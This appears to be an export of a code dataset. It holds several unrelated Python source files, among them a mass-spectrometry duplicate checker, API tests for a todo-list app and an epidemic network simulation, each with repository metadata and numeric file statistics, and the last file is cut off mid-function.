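import hashlib


def hashmd5_py3(handler, s):
    # encode str to bytes first; md5 rejects str on Python 3
    if isinstance(s, str):
        s = s.encode("utf-8")
    return hashlib.md5(s).hexdigest()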
12.25
37
0.683673
14
98
4.785714
0.857143
0
0
0
0
0
0
0
0
0
0
0.037037
0.173469
98
8
37
12.25
0.790123
0.132653
0
0
0
0
0
0
0
0
0
0
0
1
0.333333
false
0
0.333333
0.333333
1
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
1
1
1
0
0
6
a470cb91df1bd038e05291850dfc417d25cf4c6e
36
py
Python
src/models/__init__.py
jbed94/Faster-R-CNN
ebfc3ff0a84deca9672155085e57d09199023a85
[ "MIT" ]
5
2019-07-09T09:28:14.000Z
2020-09-04T13:56:02.000Z
src/models/__init__.py
jbed94/Faster-R-CNN
ebfc3ff0a84deca9672155085e57d09199023a85
[ "MIT" ]
null
null
null
src/models/__init__.py
jbed94/Faster-R-CNN
ebfc3ff0a84deca9672155085e57d09199023a85
[ "MIT" ]
1
2020-01-04T14:41:28.000Z
2020-01-04T14:41:28.000Z
from .faster_rcnn import FasterRCNN
18
35
0.861111
5
36
6
1
0
0
0
0
0
0
0
0
0
0
0
0.111111
36
1
36
36
0.9375
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
a48f3157ee8581ce9c031bbdf34b08f860994e0e
5,010
py
Python
MSDuplicateCheck.py
SLINGhub/MSOrganiser
918acda503093963a87a272f73bf6b07e8363e19
[ "MIT" ]
null
null
null
MSDuplicateCheck.py
SLINGhub/MSOrganiser
918acda503093963a87a272f73bf6b07e8363e19
[ "MIT" ]
null
null
null
MSDuplicateCheck.py
SLINGhub/MSOrganiser
918acda503093963a87a272f73bf6b07e8363e19
[ "MIT" ]
null
null
null
import sys
from collections import Counter


def check_duplicated_columns_in_wide_data(input_wide_data, output_option,
                                          logger=None, ingui=True,
                                          allow_multiple_istd=False):
    """Function to check for duplicate column names (usually Transition Name)
    in a given wide data.

    Args:
        input_wide_data (pandas DataFrame): A data frame of sample as rows and
            transition names as columns
        output_option (str): The name of the contents that the data frame
            contains. Example: Area, RT etc...
        logger (object): logger object created by start_logger in MSOrganiser
        ingui (bool): if True, print analysis status to screen
        allow_multiple_istd (bool): if True, allow input_wide_data to have
            multiple internal standards

    """

    # Convert the dataframe column name to a list
    column_name_list = input_wide_data.columns.values.tolist()

    # Get a list of duplicated column names
    duplicated_column_name_list = [key for key in Counter(column_name_list).keys()
                                   if Counter(column_name_list)[key] > 1]

    # When there are duplicated
    if len(duplicated_column_name_list) > 0:
        # Convert the list into a string
        duplicated_column_name_string = ""
        if allow_multiple_istd:
            duplicated_column_name_string = ", ".join(map(str, duplicated_column_name_list))
        else:
            duplicated_column_name_string = ", ".join(duplicated_column_name_list)

        # Inform the user and stop the program
        if logger:
            logger.warning('In the %s data frame, ' +
                           'there are column names (Transition_Name) in the output files that are duplicated. ' +
                           'The data in these duplicated column names may be different. ' +
                           'Please check the input files especially if you are concatenating by columns. ' +
                           'Duplicated columns are %s',
                           output_option, duplicated_column_name_string)
        if ingui:
            print('In the ' + output_option + ' data frame, ' +
                  'there are column names (Transition_Name) in the output files that are duplicated. ' +
                  'The data in these duplicated column names may be different. ' +
                  'Please check the input files especially if you are concatenating by columns. ' +
                  'Duplicated columns are ' + duplicated_column_name_string,
                  flush=True)
        sys.exit(-1)


def check_duplicated_sample_names_in_wide_data(input_wide_data, output_option,
                                               logger=None, ingui=True,
                                               allow_multiple_istd=False):
    """Function to check for duplicate sample names in a given wide data.

    Args:
        input_wide_data (pandas DataFrame): A data frame of sample as rows and
            transition names as columns
        output_option (str): The name of the contents that the data frame
            contains. Example: Area, RT etc...
        logger (object): logger object created by start_logger in MSOrganiser
        ingui (bool): if True, print analysis status to screen
        allow_multiple_istd (bool): if True, allow input_wide_data to have
            multiple internal standards

    """

    # Convert the sample name column to a list
    unique_Sample_Name_list = []
    if allow_multiple_istd:
        unique_Sample_Name_list = input_wide_data[("Sample_Name", "")].tolist()
    else:
        unique_Sample_Name_list = input_wide_data["Sample_Name"].tolist()

    # Get a list of duplicated column names
    duplicated_Sample_Name_list = [key for key in Counter(unique_Sample_Name_list).keys()
                                   if Counter(unique_Sample_Name_list)[key] > 1]

    # When there are duplicated
    if len(duplicated_Sample_Name_list) > 0:
        # Convert the list into a string
        duplicated_Sample_Name_string = ", ".join(duplicated_Sample_Name_list)

        # Inform the user and stop the program
        if logger:
            logger.warning('In the %s data frame, ' +
                           'there are sample names in the output files that are duplicated. ' +
                           'The data in these duplicated row names may be different. ' +
                           'Please check the input files especially if you are concatenating by rows. ' +
                           'Duplicated sample names are %s',
                           output_option, duplicated_Sample_Name_string)
        if ingui:
            print('In the ' + output_option + ' data frame, ' +
                  'there are sample names in the output files that are duplicated. ' +
                  'The data in these duplicated row names may be different. ' +
                  'Please check the input files especially if you are concatenating by rows. ' +
                  'Duplicated sample names are ' + duplicated_Sample_Name_string,
                  flush=True)
        sys.exit(-1)
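The duplicate scan above rebuilds the Counter once per key inside the list comprehension, which is quadratic in the number of names. A minimal single-pass sketch of the same check; the helper name is hypothetical:

from collections import Counter


def duplicated_keys(names):
    # one Counter pass over the list; keep only names seen more than once
    counts = Counter(names)
    return [name for name, count in counts.items() if count > 1]


assert duplicated_keys(["a", "b", "a", "c", "b"]) == ["a", "b"]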
51.649485
135
0.632735
626
5,010
4.870607
0.166134
0.039357
0.038373
0.042637
0.861594
0.790423
0.790423
0.755658
0.755658
0.726796
0
0.001725
0.305589
5,010
96
136
52.1875
0.874677
0.28024
0
0.538462
0
0
0.296906
0
0
0
0
0
0
1
0.038462
false
0
0.038462
0
0.076923
0.038462
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
a495c2d0574d766741a95b95cca307a0fd5ed011
156
py
Python
tests/tensortrade/unit/actions/test_action_scheme.py
bwcknr/tensortrade
376f5e4cc4ad7df271774088884fbe88f8feb7d8
[ "Apache-2.0" ]
34
2020-06-05T22:39:53.000Z
2022-01-09T03:09:12.000Z
tests/tensortrade/unit/actions/test_action_scheme.py
bwcknr/tensortrade
376f5e4cc4ad7df271774088884fbe88f8feb7d8
[ "Apache-2.0" ]
1
2022-01-17T06:38:27.000Z
2022-01-17T06:38:27.000Z
tests/tensortrade/unit/actions/test_action_scheme.py
bwcknr/tensortrade
376f5e4cc4ad7df271774088884fbe88f8feb7d8
[ "Apache-2.0" ]
8
2020-06-01T12:09:53.000Z
2022-01-18T14:45:29.000Z
from gym.spaces import Discrete

from tensortrade import TradingContext
from tensortrade.actions import ActionScheme
from tensortrade.orders import Trade
19.5
44
0.858974
19
156
7.052632
0.578947
0.335821
0
0
0
0
0
0
0
0
0
0
0.121795
156
7
45
22.285714
0.978102
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
f1147796939ac2e1d57e13e3f8ea0bfc0440a336
21
py
Python
example_project/some_modules/third_modules/a154.py
Yuriy-Leonov/cython_imports_limit_issue
2f9e7c02798fb52185dabfe6ce3811c439ca2839
[ "MIT" ]
null
null
null
example_project/some_modules/third_modules/a154.py
Yuriy-Leonov/cython_imports_limit_issue
2f9e7c02798fb52185dabfe6ce3811c439ca2839
[ "MIT" ]
null
null
null
example_project/some_modules/third_modules/a154.py
Yuriy-Leonov/cython_imports_limit_issue
2f9e7c02798fb52185dabfe6ce3811c439ca2839
[ "MIT" ]
null
null
null
class A154:
    pass
7
11
0.619048
3
21
4.333333
1
0
0
0
0
0
0
0
0
0
0
0.214286
0.333333
21
2
12
10.5
0.714286
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0.5
0
0
0.5
0
1
1
0
null
0
0
0
0
0
0
0
0
0
0
1
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
1
0
0
0
0
0
6
f119b5d4beb70730381e86765733b13ef1a9853c
13
py
Python
PTTLibrary/Version.py
csongs/PTTLibrary
8bfe17fb90bdbc15395ef6bf7d77eb6a2df4ddad
[ "MIT" ]
null
null
null
PTTLibrary/Version.py
csongs/PTTLibrary
8bfe17fb90bdbc15395ef6bf7d77eb6a2df4ddad
[ "MIT" ]
null
null
null
PTTLibrary/Version.py
csongs/PTTLibrary
8bfe17fb90bdbc15395ef6bf7d77eb6a2df4ddad
[ "MIT" ]
1
2019-11-21T15:17:01.000Z
2019-11-21T15:17:01.000Z
Ver = '0.7.3'
13
13
0.461538
4
13
1.5
1
0
0
0
0
0
0
0
0
0
0
0.272727
0.153846
13
1
13
13
0.272727
0
0
0
0
0
0.357143
0
0
0
0
0
0
1
0
false
0
0
0
0
0
1
1
1
null
0
0
0
0
0
0
0
0
0
0
1
0
0
1
0
0
1
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
f13762d4600499acd31000ec315081d6b392f111
96
py
Python
web-app/backend/emotion/main/__init__.py
syzroy/4099-Emotion-Analyser
de5b0fc28f97fbe7c55cf50413587fd55ae572ea
[ "MIT" ]
1
2019-09-02T09:18:19.000Z
2019-09-02T09:18:19.000Z
web-app/backend/emotion/main/__init__.py
syzroy/4099-Emotion-Analyser
de5b0fc28f97fbe7c55cf50413587fd55ae572ea
[ "MIT" ]
null
null
null
web-app/backend/emotion/main/__init__.py
syzroy/4099-Emotion-Analyser
de5b0fc28f97fbe7c55cf50413587fd55ae572ea
[ "MIT" ]
1
2020-03-31T22:48:55.000Z
2020-03-31T22:48:55.000Z
from flask import Blueprint

blueprint = Blueprint('main', __name__)

from . import controllers
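A hedged sketch of how this blueprint might be registered on an application; the app object, the import path, and the URL prefix are assumptions, not taken from this record:

from flask import Flask

from emotion.main import blueprint  # assumed import path for this package

app = Flask(__name__)
# register_blueprint wires the blueprint's routes into the app
app.register_blueprint(blueprint, url_prefix="/main")  # prefix is hypothetical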
16
39
0.78125
11
96
6.454545
0.636364
0.507042
0
0
0
0
0
0
0
0
0
0
0.145833
96
5
40
19.2
0.865854
0
0
0
0
0
0.041667
0
0
0
0
0
0
1
0
false
0
0.666667
0
0.666667
0.666667
1
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
1
1
0
6
f14527fea38073a7de574084fec0d41b8bb443a3
59
py
Python
handlers/__init__.py
arbaishev/urlshortener-tg-bot
e758a1235f3bb6a5b057cd9f6f9b6ecdc586bc27
[ "MIT" ]
null
null
null
handlers/__init__.py
arbaishev/urlshortener-tg-bot
e758a1235f3bb6a5b057cd9f6f9b6ecdc586bc27
[ "MIT" ]
null
null
null
handlers/__init__.py
arbaishev/urlshortener-tg-bot
e758a1235f3bb6a5b057cd9f6f9b6ecdc586bc27
[ "MIT" ]
null
null
null
from . import basic_commands
from . import custom_commands
19.666667
29
0.830508
8
59
5.875
0.625
0.425532
0
0
0
0
0
0
0
0
0
0
0.135593
59
2
30
29.5
0.921569
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
f17e98f8e95a8abbe3aa433b765288baef0cfbc8
6,404
py
Python
tasks/tests/test_todolist_endpoint.py
Shizuku-Asami/todolist
2bbd2f8cc20176e3871945f604135280da606875
[ "MIT" ]
null
null
null
tasks/tests/test_todolist_endpoint.py
Shizuku-Asami/todolist
2bbd2f8cc20176e3871945f604135280da606875
[ "MIT" ]
null
null
null
tasks/tests/test_todolist_endpoint.py
Shizuku-Asami/todolist
2bbd2f8cc20176e3871945f604135280da606875
[ "MIT" ]
null
null
null
import pytest
from django.test import Client
from rest_framework import status
import logging

from users.models import User
from tasks.models import TodoList, TodoItem

LOGGER = logging.getLogger(__name__)


@pytest.fixture
def login_data():
    data = {
        "email": "testuser@example.com",
        "password": "12345678",
    }
    return data


@pytest.fixture
def data():
    """
    Minimal data to create a todolist object in the database.
    """
    data = {
        "todoitem_todolist": [],
        "name": "test todolist",
        "description": "A description for the new todolist",
    }
    return data


@pytest.fixture
def data_extra():
    """
    Todolist data with todoitems.
    """
    data = {
        "name": "test todolist",
        "description": "A description for the new todolist",
        "todoitem_todolist": [
            {
                "name": "item 1",
                "description": "easy",
                "is_done": False,
            },
        ],
    }
    return data


@pytest.fixture
def data_extra1():
    """
    Todolist data with todoitems.
    """
    data = {
        "name": "test todolist",
        "description": "A description for the new todolist",
        "todoitem_todolist": [
            {
                "name": "item 1",
                "description": "easy",
                "is_done": False,
            },
            {
                "name": "item 2",
                "description": "medium",
                "is_done": False,
            },
        ],
    }
    return data


@pytest.fixture
def user():
    return User.objects.create_user(email="testuser@example.com", password="12345678")


@pytest.fixture
def client():
    client = Client(
        enforce_csrf_checks=True,
        HTTP_USER_AGENT="Mozilla/5.0",
    )
    return client


@pytest.fixture
@pytest.mark.django_db
def auth_client(client, login_data, user):
    response = client.post("/users/login", login_data)
    access_token = response.data["tokens"]["access"]
    headers = {"HTTP_AUTHORIZATION": "Bearer " + access_token}
    client.defaults = headers
    return client


@pytest.mark.django_db
def test_create_todolist_with_minimal_data_returns_http_201_created(
    auth_client, data, user
):
    data["user"] = user.id
    response = auth_client.post("/todolists/", data)
    assert response.status_code == status.HTTP_201_CREATED


@pytest.mark.django_db
def test_create_todolist_with_at_least_one_todoitem_returns_http_201_created(
    auth_client, data_extra, user
):
    data_extra["user"] = user.id
    response = auth_client.post("/todolists/", data_extra)
    assert response.status_code == status.HTTP_201_CREATED


@pytest.mark.django_db
def test_create_todolist_with_many_todoitems_returns_http_201_created(
    auth_client, data_extra1, user
):
    data_extra1["user"] = user.id
    response = auth_client.post("/todolists/", data_extra1)
    assert response.status_code == status.HTTP_201_CREATED


@pytest.mark.django_db
def test_create_todolist_without_todoitems_returns_valid_response(
    auth_client, data, user
):
    data["user"] = user.id
    response = auth_client.post("/todolists/", data)
    LOGGER.info("Response data: %s", response.data)
    for key in data.keys():
        assert key in response.data.keys()
        assert data[key] == response.data[key]


@pytest.mark.django_db
def test_create_todolist_with_one_todoitem_returns_valid_response(
    auth_client, data_extra, user
):
    data_extra["user"] = user.id
    response = auth_client.post("/todolists/", data_extra)
    LOGGER.info("Response data: %s", response.data)
    for key in data_extra.keys():
        if key == "todoitem_todolist":
            for i in data_extra[key]:
                assert i in response.data[key].keys()
                assert data_extra[key][i] == response.data[key][i]
        else:
            assert key in response.data.keys()
            assert data_extra[key] == response.data[key]


@pytest.mark.django_db
def test_create_todolist_with_todoitems_returns_valid_response(
    auth_client, data_extra1, user
):
    data_extra1["user"] = user.id
    response = auth_client.post("/todolists/", data_extra1)
    LOGGER.info("Response data: %s", response.data)
    for key in data_extra1.keys():
        if key == "todoitem_todolist":
            for i in data_extra1[key]:
                assert i in response.data[key].keys()
                assert data_extra1[key][i] == response.data[key][i]
        else:
            assert key in response.data.keys()
            assert data_extra1[key] == response.data[key]


@pytest.mark.django_db
def test_get_todolist_returns_http_200_ok(auth_client, user):
    pass


@pytest.mark.django_db
def test_get_all_todolist_for_current_user(auth_client, user):
    response = auth_client.get("/todolists/")
    LOGGER.info("Response data: %s", response.data)


@pytest.mark.django_db
def test_update_todolist_name_returns_http_200_ok(auth_client, user):
    pass


@pytest.mark.django_db
def test_update_todolist_name_returns_updated_todolist(auth_client, user):
    pass


@pytest.mark.django_db
def test_update_todolist_description_returns_http_200_ok(auth_client, user):
    pass


@pytest.mark.django_db
def test_update_todolist_description_returns_updated_todolist(auth_client, user):
    pass


@pytest.mark.django_db
def test_update_todolist_todoitems_returns_http_200_ok(auth_client, user):
    pass


@pytest.mark.django_db
def test_update_todolist_todoitems_returns_updated_todolist(auth_client, user):
    pass


@pytest.mark.django_db
def test_update_todolist_multiple_fields_returns_http_200_ok(auth_client, user):
    pass


@pytest.mark.django_db
def test_update_todolist_multiple_fields_returns_updated_todolist(auth_client, user):
    pass


@pytest.mark.django_db
def test_delete_todolist_returns_http_200_ok(auth_client, user):
    pass


@pytest.mark.django_db
def test_delete_todolist_removes_todolist_data_from_database(auth_client, client):
    pass


@pytest.mark.django_db
def test_user_cannot_create_todolist_for_another_user(auth_client, user):
    pass


@pytest.mark.django_db
def test_user_cannot_get_todolist_of_another_user(auth_client, user):
    pass


@pytest.mark.django_db
def test_user_cannot_update_todolist_of_another_user(auth_client, user):
    pass


@pytest.mark.django_db
def test_user_cannot_delete_todolist_of_another_user(auth_client, user):
    pass
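Several of the tests above are still pass placeholders. A hedged sketch of how one pending GET test might be filled in, reusing only the /todolists/ endpoint and the fixtures already present in this file (the test name is illustrative):

@pytest.mark.django_db
def test_get_all_todolists_returns_http_200_ok(auth_client, user):
    # same endpoint the creation tests post to; relies on the JWT-wired client
    response = auth_client.get("/todolists/")
    assert response.status_code == status.HTTP_200_OK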
25.212598
86
0.687851
829
6,404
4.992762
0.13269
0.072481
0.08891
0.100024
0.796328
0.785939
0.746799
0.707659
0.674076
0.637352
0
0.013418
0.20862
6,404
253
87
25.312253
0.803275
0.01827
0
0.612022
0
0
0.106874
0
0
0
0
0.011858
0.071038
1
0.15847
false
0.092896
0.032787
0.005464
0.229508
0
0
0
0
null
0
0
0
0
1
1
1
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
1
0
0
0
0
1
0
0
0
0
0
6
f18d49e62425073162c0a2b27cec8d6f89224cc4
129
py
Python
tests/test_datapublic.py
ConsultingMD/covid-data-public
2b7091f7cc3877df45a7887709e999b0ebdf30ec
[ "MIT" ]
17
2020-03-26T19:40:09.000Z
2021-08-31T04:07:30.000Z
tests/test_datapublic.py
ConsultingMD/covid-data-public
2b7091f7cc3877df45a7887709e999b0ebdf30ec
[ "MIT" ]
78
2020-03-27T23:10:51.000Z
2021-09-20T21:41:27.000Z
tests/test_datapublic.py
ConsultingMD/covid-data-public
2b7091f7cc3877df45a7887709e999b0ebdf30ec
[ "MIT" ]
11
2020-03-29T00:23:44.000Z
2021-02-12T23:36:07.000Z
from covidactnow.datapublic.common_fields import CommonFields


def test_import_worked():
    assert CommonFields.DATE == "date"
21.5
61
0.79845
15
129
6.666667
0.8
0
0
0
0
0
0
0
0
0
0
0
0.124031
129
5
62
25.8
0.884956
0
0
0
0
0
0.031008
0
0
0
0
0
0.333333
1
0.333333
true
0
0.666667
0
1
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
1
0
1
0
1
0
0
6
74b8ab1aaeacf133316533b1f7ae93886ac7521c
71,951
py
Python
do_experiment.py
figlerg/network_tracing
97ee6bbcad1a4ca30736d23ee0c00b0f2a6ae5f2
[ "BSD-3-Clause" ]
null
null
null
do_experiment.py
figlerg/network_tracing
97ee6bbcad1a4ca30736d23ee0c00b0f2a6ae5f2
[ "BSD-3-Clause" ]
null
null
null
do_experiment.py
figlerg/network_tracing
97ee6bbcad1a4ca30736d23ee0c00b0f2a6ae5f2
[ "BSD-3-Clause" ]
null
null
null
import hashlib import os import pickle import matplotlib import matplotlib.pyplot as plt import numpy as np from matplotlib.ticker import FormatStrFormatter import matplotlib as mpl from globals import * from net import Net from tqdm import tqdm import cycler import random random.seed(12345) # Direct input plt.rcParams['text.latex.preamble'] = r"\usepackage{bm} \usepackage{amsmath}" # plt.rcParams['text.latex.preamble']=[r"\usepackage{lmodern}"] # Options params = {'text.usetex': True, 'font.size': 10, 'font.family': 'serif' # 'font.family' : 'lmodern', } plt.rcParams.update(params) columwidth = 251.8 / 72.27 # 251.80688[pt] / 72.27[pt/inch] def estimateQuotientCI(ax, xvalues, mean1, sd1, mean2, sd2, color, mccount, p=95): iters = 2000 lowers = list() uppers = list() percs = [(100 - p) / 2, 100 - (100 - p) / 2] """ Monte Carlo mean 1/N*sum(X_i) implies: V(1/N*sum(X_i))=1/(N^2)*sum(V(X_i))=1/(N^2)*N*V(X)=V(X)/N => Variance of monte carlo mean is 1/N times variance of single model result => SD is 1/sqrt(N) times SD of model result """ sd11 = sd1 / (mccount ** 0.5) sd21 = sd2 / (mccount ** 0.5) for m1, s1, m2, s2 in zip(mean1, sd11, mean2, sd21): quotients = list() for i in range(iters): """ since (sum(X_i)-mu)/(sqrt(N)*sigma) converges towards Normal(0,1) we may assume 1/N*sum(X_i) approx ~ Normal(mu,sigma/sqrt(N)) """ denom = random.normalvariate(m2, s2) if denom <= 0: # truncate normal dist - negative values dont make sense continue nom = random.normalvariate(m1, s1) if nom < 0: # truncate normal dist - negative values dont make sense continue quotients.append(nom / denom) ps = np.percentile(quotients, percs) lowers.append(ps[0]) uppers.append(ps[1]) ax.fill_between(xvalues, lowers, uppers, color=color, alpha=0.2, zorder=-1) # pickling disabled for now, uncomment plot lines for that def simple_experiment_old(n, p, p_i, mc_iterations, max_t, seed=0, mode=None, force_recompute=False, path=None, clustering: float = None, dispersion=None): # this creates the net, runs monte carlo on it and saves the resulting timeseries plot, as well as pickles for net and counts assert not (dispersion and clustering), "Cannot set a dispersion target and " \ "a clustering target at the same time" if dispersion: chosen_epsilon = epsilon_disp else: chosen_epsilon = epsilon_clustering if path: dirname = path else: dirname_parent = os.path.dirname(__file__) dirname = os.path.join(dirname_parent, 'Experiments') # the cache is now tagged with a hash from all important parameters instead of the above. 
# Any change to the model parameters will certainly trigger a recompute now id_params = ( n, p, p_i, mc_iterations, max_t, seed, mode, clustering, dispersion, t_i, t_c, t_r, t_d, t_t, p_q, p_t, quarantine_time, resolution, chosen_epsilon) # normal hashes are salted between runs -> use something that is persistent tag = str(hashlib.md5(str(id_params).encode('utf8')).hexdigest()) # disables loading pickled results if force_recompute: # if false, it looks at saved experiments and reuses those net = Net(n=n, p=p, p_i=p_i, max_t=max_t, seed=seed, clustering_target=clustering, dispersion_target=dispersion) counts, sd, achieved_clustering, achieved_disp = net.monte_carlo(mc_iterations, mode=mode) with open(os.path.join(dirname, tag + '_net.p'), 'wb') as f: pickle.dump((net, achieved_clustering, achieved_disp), f) with open(os.path.join(dirname, tag + '_counts.p'), 'wb') as f: pickle.dump((counts, sd), f) else: try: with open(os.path.join(dirname, tag + "_counts.p"), 'rb') as f: counts, sd = pickle.load(f) with open(os.path.join(dirname, tag + "_net.p"), 'rb') as f: net, achieved_clustering, achieved_disp = pickle.load(f) print('Experiment results have been loaded from history.') except FileNotFoundError: net = Net(n=n, p=p, p_i=p_i, max_t=max_t, seed=seed, clustering_target=clustering, dispersion_target=dispersion) counts, sd, achieved_clustering, achieved_disp = net.monte_carlo(mc_iterations, mode=mode) with open(os.path.join(dirname, tag + '_net.p'), 'wb') as f: pickle.dump((net, achieved_clustering, achieved_disp), f) with open(os.path.join(dirname, tag + '_counts.p'), 'wb') as f: pickle.dump((counts, sd), f) exposed = counts[EXP_STATE, :] infected = counts[INF_STATE, :] ep_curve = exposed + infected # compute when the peak happens and what the ratio of infected is then t_peak = np.argmax(ep_curve, axis=0) peak_height = ep_curve[t_peak] / n # compute the ratio of all exposed people at end of sim to the number of indiv. # (also check heuristically whether an equilibrium has been reached recovered = counts[REC_STATE, :] virus_contacts = ep_curve + recovered sensitivity = max(1, n / 100) # increasing divisor makes this more sensitive equilib_flag = abs( virus_contacts[-1] - virus_contacts[-2]) < sensitivity # just a heuristic, see whether roc is low period_prevalence = virus_contacts[-1] / n return net, counts, sd, t_peak, peak_height, equilib_flag, period_prevalence, achieved_clustering, achieved_disp from do_experiment_parallel import \ simple_experiment # this is the new, parallel version of the above function. By Martin! def vary_p(res, n, p_i, mc_iterations, max_t, interval=(0, 1), seed=0, mode=None, force_recompute=False, path=None): # here I want to systematically check what varying the edge probability does. Should return something like a 1d heatmap? 
# return value should use one of the values t_peak, peak_height, equilib_flag, period_prevalence peak_times = np.ndarray(res) mean_peak_heights = np.ndarray(res) mean_period_prevalences = np.ndarray(res) sd_peak_heights = np.ndarray(res) sd_period_prevalences = np.ndarray(res) ps = np.linspace(interval[0], interval[1], endpoint=True, num=res) for i, p in enumerate(ps): net, mean_counts, sd_counts, t_peak, mean_peak, sd_peak, mean_prevalence, sd_prevalence, equilib_flag, clustering, dispersion = \ simple_experiment(n, p, p_i, mc_iterations, max_t, seed=seed + i, mode=mode, force_recompute=force_recompute, path=path) peak_times[i] = t_peak mean_peak_heights[i] = mean_peak sd_peak_heights[i] = sd_peak mean_period_prevalences[i] = mean_prevalence sd_period_prevalences[i] = sd_prevalence fig, axes = plt.subplots(3, 1, sharex=True, figsize=(16 * 1.5, 9 * 1.5)) ax1, ax2, ax3 = axes if mode: ax1.set_title(mode) else: ax1.set_title('vanilla') ax1.plot(ps, peak_times) # ax1.set_xlabel('p') ax1.set_ylabel('Peak time') ax2.plot(ps, mean_peak_heights) # ax2.set_xlabel('p') ax2.set_ylabel('Peak prevalence') ax3.plot(ps, mean_period_prevalences) ax3.set_ylabel('Fraction of affected') ax3.set_xlabel('p') # labels = [interval[0],] + list(['' for i in range(len(ps)-2)]) + [interval[1],] ax3.set_xticks(ps[1:-2], minor=True) ax3.set_xticks([interval[0], interval[1]]) plt.tick_params( axis='x', # changes apply to the x-axis which='minor', # both major and minor ticks are affected # bottom=False, # ticks along the bottom edge are off # top=False, # ticks along the top edge are off labelbottom=False) # labels along the bottom edge are off # plt.xticks([interval[0],interval[1]]) if mode: fig.savefig(os.path.join(path, 'pvaried_n{}_p{}_{}'.format( n, str(interval[0]) + 'to' + str(interval[1]), mode) + '.png')) else: fig.savefig(os.path.join(path, 'pvaried_n{}_p{}'.format( n, str(interval[0]) + 'to' + str(interval[1])) + '.png')) def vary_p_plot_cache(res, n, p_i, mc_iterations, max_t, interval=(0, 1), seed=0, force_recompute=False, path=None): # utility function that loads all the pickles (or runs them first) and plots the three scenarios # is a modified copy of vary_p ! 
peak_times = np.ndarray(res) peak_heights = np.ndarray(res) period_prevalences = np.ndarray(res) peak_times_q = np.ndarray(res) peak_heights_q = np.ndarray(res) period_prevalences_q = np.ndarray(res) peak_times_t = np.ndarray(res) peak_heights_t = np.ndarray(res) period_prevalences_t = np.ndarray(res) peak_heights_sd = np.ndarray(res) peak_heights_q_sd = np.ndarray(res) peak_heights_t_sd = np.ndarray(res) period_prevalences_sd = np.ndarray(res) period_prevalences_q_sd = np.ndarray(res) period_prevalences_t_sd = np.ndarray(res) ps = np.linspace(interval[0], interval[1], endpoint=True, num=res) # all 3 modes for i, p in tqdm(enumerate(ps), total=res, desc='Vanilla'): net, mean_counts, sd_counts, t_peak, mean_peak, sd_peak, mean_prevalence, sd_prevalence, equilib_flag, achieved_clustering, achieved_disp = \ simple_experiment(n, p, p_i, mc_iterations, max_t, seed=seed + i + res, mode=None, force_recompute=force_recompute, path=path) peak_times[i] = t_peak peak_heights[i] = mean_peak peak_heights_sd[i] = sd_peak period_prevalences[i] = mean_prevalence period_prevalences_sd[i] = sd_prevalence for i, p in tqdm(enumerate(ps), total=res, desc='Quarantine'): net, mean_counts, sd_counts, t_peak, mean_peak, sd_peak, mean_prevalence, sd_prevalence, equilib_flag, achieved_clustering, achieved_disp = \ simple_experiment(n, p, p_i, mc_iterations, max_t, seed=seed + i + 2 * res, mode='quarantine', force_recompute=force_recompute, path=path) peak_times_q[i] = t_peak peak_heights_q[i] = mean_peak peak_heights_q_sd[i] = sd_peak period_prevalences_q[i] = mean_prevalence period_prevalences_q_sd[i] = sd_prevalence for i, p in tqdm(enumerate(ps), total=res, desc='Tracing'): net, mean_counts, sd_counts, t_peak, mean_peak, sd_peak, mean_prevalence, sd_prevalence, equilib_flag, achieved_clustering, achieved_disp = \ simple_experiment(n, p, p_i, mc_iterations, max_t, seed=seed + i + 3 * res, mode='tracing', force_recompute=force_recompute, path=path) peak_times_t[i] = t_peak peak_heights_t[i] = mean_peak peak_heights_t_sd[i] = sd_peak period_prevalences_t[i] = mean_prevalence period_prevalences_t_sd[i] = sd_prevalence fig, axes = plt.subplots(3, 1, sharex=True, figsize=(14, 14 / 16 * 9)) ax1, ax2, ax3 = axes ax1.plot(ps, peak_times, ps, peak_times_q, ps, peak_times_t) ax1.set_ylabel('Peak time') ax2.plot(ps, peak_heights, ps, peak_heights_q, ps, peak_heights_t) ax2.set_ylabel('Peak prevalence') ax3.plot(ps, period_prevalences, ps, period_prevalences_q, ps, period_prevalences_t) ax3.set_ylabel('Fraction of affected') ax3.set_xlabel('p') ax3.set_xticks(ps[1:-2], minor=True) ax3.set_xticks([interval[0], interval[1]]) plt.legend(['Vanilla', 'Quarantine', 'Tracing']) plt.tick_params( axis='x', which='minor', # bottom=False, # ticks along the bottom edge are off # top=False, # ticks along the top edge are off labelbottom=False) # labels along the bottom edge are off # plt.xticks([interval[0],interval[1]]) parent = os.path.dirname(path) fig.savefig(os.path.join(parent, 'Pics', 'pvaried_n{}_mc{}_{}'.format(n, mc_iterations, 'comp') + '.png'), bbox_inches='tight') # this feels pretty uninteresting: def vary_p_i(res, n, p, mc_iterations, max_t, seed=0, mode=None, force_recompute=False, path=None): # here I want to systematically check what varying the edge probability does. Should return something like a 1d heatmap? 
